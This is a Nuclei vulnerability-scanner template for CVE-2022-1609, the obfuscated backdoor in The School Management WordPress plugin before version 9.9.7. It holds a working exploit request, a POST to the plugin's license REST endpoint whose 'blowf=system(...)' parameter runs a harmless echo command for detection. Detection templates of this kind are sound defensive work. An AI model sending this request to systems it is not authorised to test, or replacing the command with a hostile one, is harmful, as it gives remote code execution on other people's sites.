40 lines
1.4 KiB
YAML
40 lines
1.4 KiB
YAML
id: CVE-2022-1609
|
|
|
|
info:
|
|
name: The School Management < 9.9.7 - Remote Code Execution
|
|
author: For3stCo1d
|
|
severity: critical
|
|
description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
|
|
remediation: |
|
|
Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2022-1609
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
verified: false
|
|
max-request: 1
|
|
tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress
|
|
variables:
|
|
cmd: "echo CVE-2022-1609 | rev"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-json/am-member/license HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
blowfish=1&blowf=system('{{cmd}}');
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '9061-2202-EVC'
|
|
# digest: 490a004630440220106f7b38017ab6613cc6dd880b6e64fe3989606d0efe2995cd80715213505ff702207b8882e9387e708b16ade4fdee42b0d258135f001acff0998023a551a560d2f3:922c64590222798bb761d5b6d8e72950 |